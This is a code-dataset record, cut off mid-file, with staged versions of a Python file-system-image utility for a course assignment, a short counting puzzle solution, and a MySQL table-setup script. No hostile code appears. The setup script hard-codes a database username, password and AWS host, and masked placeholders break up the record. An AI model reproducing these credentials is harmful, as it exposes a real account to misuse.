file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\n<mask token>\n",
"step-3": "<mask token>\nfile.seek(10)\n<mask token>\nfile.seek(20)\n<mask token>\nfile.seek(40)\n<mask token>\nfile.seek(47)\n<mask token>\nfile.seek(52)\n<mask token>\nfile.close()\n<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\nif nombre == 'FiUnamFS' and version == '0.7':\n correcto = True\n while correcto:\n tablaArchivos()\n print('Sistema de Archivos FI Unam FS')\n print('1: Listar')\n print('2: Copiar archivo')\n print('3: Copiar archivo a la computadora')\n print('4: Eliminar archivo')\n print('5: Desgramentar')\n print('6: Mostar informacion del sistema de archivos')\n print('7: Salir')\n opcion = 
input('Opcion: ')\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input('Nombre del archivo a borrar: ')\n if borrar(archivo):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print(va)\n elif opcion == 7:\n print('Sistema desmontado')\n correcto = False\n elif opcion == 5:\n print('No se implemento')\nelse:\n print(\n 'No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.'\n )\n exit()\n",
"step-4": "from sys import exit\nfrom os import stat\nfile = open('fiunamfs.img', 'r')\nnombre = file.read(8)\nfile.seek(10)\nversion = file.read(3)\nfile.seek(20)\netiqueta = file.read(15)\nfile.seek(40)\ncluster = file.read(5)\nfile.seek(47)\nnumero = file.read(2)\nfile.seek(52)\nnumeroCompleto = file.read(8)\nfile.close()\narchivos = []\ntams = []\nclusters = []\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\nif nombre == 'FiUnamFS' and version == '0.7':\n correcto = True\n while correcto:\n tablaArchivos()\n print('Sistema de Archivos FI Unam FS')\n print('1: Listar')\n print('2: Copiar archivo')\n print('3: Copiar 
archivo a la computadora')\n print('4: Eliminar archivo')\n print('5: Desgramentar')\n print('6: Mostar informacion del sistema de archivos')\n print('7: Salir')\n opcion = input('Opcion: ')\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input('Nombre del archivo a borrar: ')\n if borrar(archivo):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print(va)\n elif opcion == 7:\n print('Sistema desmontado')\n correcto = False\n elif opcion == 5:\n print('No se implemento')\nelse:\n print(\n 'No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.'\n )\n exit()\n",
"step-5": "from sys import exit\nfrom os import stat\n\nfile = open(\"fiunamfs.img\",\"r\")\nnombre = file.read(8)\nfile.seek(10)\nversion = file.read(3)\nfile.seek(20)\netiqueta = file.read(15)\nfile.seek(40)\ncluster = file.read(5)\nfile.seek(47)\nnumero = file.read(2)\nfile.seek(52)\nnumeroCompleto = file.read(8)\nfile.close()\n\narchivos = []\ntams = []\nclusters = []\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu=clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca \n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell()+36)\n file.close()\n\ndef info():\n print(\"Nombre del Sistema: \" + nombre)\n print(\"Version: \" + version)\n print(\"Etiqueta del Volumen: \" + etiqueta)\n print(\"Tamano del cluster en bytes: \" + cluster)\n print(\"Numero de clusters que mide el directorio: \" + numero)\n print(\"Numero de cluster que mide la unidad completa: \" + numeroCompleto)\n\ndef listar():\n file = open(\"fiunamfs.img\",\"r\")\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell()+49)\n file.close()\n\ndef borrar(archivo):\n borrado = False\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell()-15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell()+49)\n file.close()\n return borrado\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\ndef dePcASistema(path, nombre):\n posicion =0\n actual =0\n try:\n new = open(path,\"r+\")\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while(bandera == False):\n name = file.read(15)\n if (name == 'Xx.xXx.xXx.xXx.'):\n file.seek(file.tell()-15)\n file.write(nombre)\n actual = file.tell()\n print(\"El archivo fue copiado\")\n bandera = True\n file.seek(file.tell()+49)\n file.close()\n file = open(\"fiunamfs.img\",\"r+\")\n pa = clusterVacio()\n inde = 2048*pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print(\"Este archivo no existe\")\n \ndef deSistemaAPc(archivo,nombre):\n tam = 0 \n clu = 0\n file = open(\"fiunamfs.img\",\"r\") #Se abre el archivo en modo solo lectura\n file.seek(2048) #Se salta el superbloque \n new = open(archivo,\"r+\")\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if (aux == nombre):\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048*clu\n file = open(\"fiunamfs.img\",\"r\")\n file.seek(aux2)\n new.write(file.read(tam))\n \n \ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if (path[i] == '/'):\n slash = i\n for i in range(slash+1,tam):\n name = name + path[i]\n ##Agregar funcion de limiar nombres de los archivos a 15 caracteres\n espaces = 15 - len(name)\n for i in range (espaces):\n name2 = name2 + \" \"\n return name2 + name\n \n\n \n\nif (nombre == \"FiUnamFS\" and version == 
\"0.7\"):\n correcto = True\n while(correcto):\n tablaArchivos()\n print(\"Sistema de Archivos FI Unam FS\")\n print(\"1: Listar\")\n print(\"2: Copiar archivo\")\n print(\"3: Copiar archivo a la computadora\")\n print(\"4: Eliminar archivo\")\n print(\"5: Desgramentar\")\n print(\"6: Mostar informacion del sistema de archivos\")\n print(\"7: Salir\")\n opcion = input(\"Opcion: \")\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input(\"Nombre del archivo a borrar: \")\n if(borrar(archivo)):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input(\"Nombre del archivo a copiar: \")\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input(\"Nombre del archivo a copiar: \")\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print (va)\n elif opcion == 7:\n print(\"Sistema desmontado\")\n correcto = False\n elif opcion == 5:\n print(\"No se implemento\")\nelse:\n print(\"No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.\")\n exit()\n\n \n\n\n",
"step-ids": [
8,
9,
10,
12,
13
]
}
|
[
8,
9,
10,
12,
13
] |
from collections import Counter
def main():
N = int(input())
A = tuple(map(int, input().split()))
c = Counter(A).most_common()
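    # most_common() returns (value, count) pairs sorted by descending count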
if c[0][0] == 0 and c[0][1] == N:
print("Yes")
elif len(c) == 2 and c[0][1] == 2*N//3 and c[1][0] == 0 and c[1][1] == N//3:
print("Yes")
elif len(c) == 3 and int(c[0][0])^int(c[1][0]) == int(c[2][0]) and c[0][1] == c[1][1] and c[1][1] == c[2][1]:
print("Yes")
else:
print("No")
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "7c6ada250770e04b395dda774a78042da69e2854",
"index": 8681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from collections import Counter\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from collections import Counter\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n \n c = Counter(A).most_common()\n \n if c[0][0] == 0 and c[0][1] == N:\n print(\"Yes\")\n elif len(c) == 2 and c[0][1] == 2*N//3 and c[1][0] == 0 and c[1][1] == N//3:\n print(\"Yes\")\n elif len(c) == 3 and int(c[0][0])^int(c[1][0]) == int(c[2][0]) and c[0][1] == c[1][1] and c[1][1] == c[2][1]:\n print(\"Yes\")\n else:\n print(\"No\")\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'
] = 'postgresql://info2180-project1:password123@localhost/profilebook'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ['jpg', 'jpeg', 'png']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'
] = 'postgresql://info2180-project1:password123@localhost/profilebook'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ['jpg', 'jpeg', 'png']
from app import views
<|reserved_special_token_1|>
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
app.config['SECRET_KEY'] = "SuperSecretKey"
#app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r"
app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://info2180-project1:password123@localhost/profilebook"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ["jpg", "jpeg", "png"]
from app import views
|
flexible
|
{
"blob_id": "7b45c9e31bfb868b1abde6af0d8579b52f86d9c3",
"index": 5689,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SuperSecretKey'\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'postgresql://info2180-project1:password123@localhost/profilebook'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\nallowed_exts = ['jpg', 'jpeg', 'png']\n<mask token>\n",
"step-3": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom subprocess import call\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SuperSecretKey'\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'postgresql://info2180-project1:password123@localhost/profilebook'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\nallowed_exts = ['jpg', 'jpeg', 'png']\nfrom app import views\n",
"step-4": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom subprocess import call\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"SuperSecretKey\"\n#app.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r\"\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://info2180-project1:password123@localhost/profilebook\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\n\nallowed_exts = [\"jpg\", \"jpeg\", \"png\"]\n\nfrom app import views",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DB_NAME = 'PieDB'
TABLES = {}
TABLES['lemonpie'] = (
'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'
)
config = {'user': 'piemaster', 'password': 'piemaster123', 'host':
'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',
'raise_on_warnings': True}
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
TABLES['lemonpie'] = (
'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'
)
config = {'user': 'piemaster', 'password': 'piemaster123', 'host':
'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',
'raise_on_warnings': True}
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
# TABLES['pietweets'] = (
# "CREATE TABLE `pietweets` ("
# " `id` int NOT NULL AUTO_INCREMENT,"
# " `tweet_id` bigint NOT NULL,"
# " `username` varchar(32) NOT NULL,"
# " `geo_lat` float(53) NOT NULL,"
# " `geo_long` float(53) NOT NULL,"
# " `text` varchar(255) NOT NULL,"
# " `timestamp` datetime NOT NULL,"
# " PRIMARY KEY (`id`)"
# ") ENGINE=InnoDB")
TABLES['lemonpie'] = (
"CREATE TABLE `lemonpie` ("
" `id` int NOT NULL AUTO_INCREMENT,"
" `tweet_id` bigint NOT NULL,"
" `username` varchar(32) NOT NULL,"
" `geo_lat` float(53) NOT NULL,"
" `geo_long` float(53) NOT NULL,"
" `text` varchar(255) NOT NULL,"
" `timestamp` datetime NOT NULL,"
" PRIMARY KEY (`id`)"
") ENGINE=InnoDB")
# DB credentials
config = {
'user': 'piemaster',
'password': 'piemaster123',
'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',
'database': 'PieDB',
'raise_on_warnings': True,
}
# establish connection with DB config credentials
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute(
"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(DB_NAME))
except mysql.connector.Error as err:
print("Failed creating database: {}".format(err))
exit(1)
# try connecting to designated DB, if not exist - create this DB
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
# iterate through TABLES and create each table
for name, ddl in TABLES.iteritems():
try:
print("Creating table {}: ".format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print("already exists.")
else:
print(err.msg)
else:
print("OK")
# closing db connection
cursor.close()
cnx.close()
|
flexible
|
{
"blob_id": "38abc4bc99f3b15b416c77481818464a6c7f11ef",
"index": 3844,
"step-1": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-3": "<mask token>\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n 